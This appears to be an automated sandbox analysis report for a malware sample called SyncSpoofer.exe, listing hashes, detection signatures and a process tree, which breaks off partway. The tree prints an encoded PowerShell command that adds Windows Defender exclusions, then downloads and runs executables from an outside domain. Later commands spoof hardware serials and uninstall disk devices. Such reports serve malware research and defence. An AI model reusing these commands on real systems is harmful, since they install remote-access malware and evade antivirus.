Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    06-05-2024 13:28

General

  • Target

    SyncSpoofer.exe

  • Size

    2.5MB

  • MD5

    10c51aa1fc224b93206f1083082f02be

  • SHA1

    584d370ec990a36e6b0b8920aa2a31975ef1d5c6

  • SHA256

    f4e72d601237b4b9c807bb10eda596cb25912b6447db75f9d554b3398133fc79

  • SHA512

    411febdaefc44f711dcf926c576ff519062e5eb854f606770f730426fa6a586c9e4fc6a7c3c523255cdaf02c721afb52d20b1e0d498baa029d5df8ca04429274

  • SSDEEP

    49152:ucvAvIUj4MlR9zMKwS/R0Tg5iWzu659A6/q7fUn9ZTF/cYFylcJD2uxN:ucvAgUh/9Pgv659A6y7fUn9ZTF/NF9z

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 30 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 60 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SyncSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\SyncSpoofer.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2332
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBhAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZABoAGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABuAHkAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBqAHMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHAAaABhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAHQAZwBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaQB5AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAaQB0AGUAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHUAawBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBjAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawB5AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBjAGcAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGkAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBlAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGsAcABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAagBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBpAHoAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAByAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAByAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcgBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAHIAeAB3ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2308
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: C601-796P
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2876
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: C601-796P
            5⤵
            • Executes dropped EXE
            PID:840
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2396
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1432
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:584
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1952
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:696
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1112
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1736
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:828
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2240
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1564
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2264
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:844
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1800
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          • Loads dropped DLL
          PID:2640
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 31025HP-TRGT18056AB
            5⤵
            • Executes dropped EXE
            PID:2584
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
            PID:1660
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 231025HP-TRGT18056RV
              5⤵
              • Executes dropped EXE
              PID:2376
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
            4⤵
              PID:2400
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 831028HP-TRGT28804SG
                5⤵
                • Executes dropped EXE
                PID:1208
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
              4⤵
                PID:2384
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                  5⤵
                  • Executes dropped EXE
                  PID:1936
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                4⤵
                  PID:1668
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 531028HP-TRGT28804SL
                    5⤵
                    • Executes dropped EXE
                    PID:2624
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                  4⤵
                    PID:2756
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 431028HP-TRGT28804FA
                      5⤵
                      • Executes dropped EXE
                      PID:748
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                    4⤵
                      PID:936
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 631028HP-TRGT28804FU
                        5⤵
                        • Executes dropped EXE
                        PID:2416
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                      4⤵
                        PID:952
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 331028HP-TRGT28804DQ
                          5⤵
                          • Executes dropped EXE
                          PID:1476
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                        4⤵
                          PID:1132
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 731028HP-TRGT28804MST
                            5⤵
                            • Executes dropped EXE
                            PID:2228
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                          4⤵
                            PID:2924
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                              5⤵
                              • Executes dropped EXE
                              PID:2256
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                            4⤵
                              PID:1104
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 31048HP-TRGT27759AB
                                5⤵
                                • Executes dropped EXE
                                PID:2156
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                              4⤵
                                PID:2148
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 231048HP-TRGT27759RV
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2432
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                4⤵
                                  PID:2576
                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 831048HP-TRGT27759SG
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1644
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                  4⤵
                                    PID:2460
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2736
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                    4⤵
                                      PID:2456
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 531048HP-TRGT27759SL
                                        5⤵
                                        • Executes dropped EXE
                                        PID:948
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                      4⤵
                                        PID:1600
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 431048HP-TRGT27759FA
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1320
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                        4⤵
                                          PID:1748
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 631048HP-TRGT27759FU
                                            5⤵
                                            • Executes dropped EXE
                                            PID:1456
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                          4⤵
                                            PID:1608
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 331048HP-TRGT27759DQ
                                              5⤵
                                              • Executes dropped EXE
                                              PID:884
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                            4⤵
                                              PID:2724
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 731048HP-TRGT27759MST
                                                5⤵
                                                • Executes dropped EXE
                                                PID:1752
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                              4⤵
                                                PID:928
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:620
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                4⤵
                                                  PID:2920
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 31064HP-TRGT15965AB
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2120
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                  4⤵
                                                    PID:1020
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 231064HP-TRGT15965RV
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:1444
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                    4⤵
                                                      PID:924
                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 831064HP-TRGT15965SG
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:2604
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                      4⤵
                                                        PID:1824
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:1080
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                        4⤵
                                                          PID:780
                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 531064HP-TRGT15965SL
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:1132
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                          4⤵
                                                            PID:2264
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 431064HP-TRGT15965FA
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:564
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                            4⤵
                                                              PID:3024
                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 631064HP-TRGT15965FU
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:2000
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                              4⤵
                                                                PID:528
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 331064HP-TRGT15965DQ
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:972
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                4⤵
                                                                  PID:1136
                                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 731064HP-TRGT15965MST
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:2944
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                  4⤵
                                                                    PID:2208
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1160
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: EI0S-O1AR
                                                                    4⤵
                                                                      PID:2452
                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: EI0S-O1AR
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:1860
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: DSCG-EV6C
                                                                      4⤵
                                                                        PID:2424
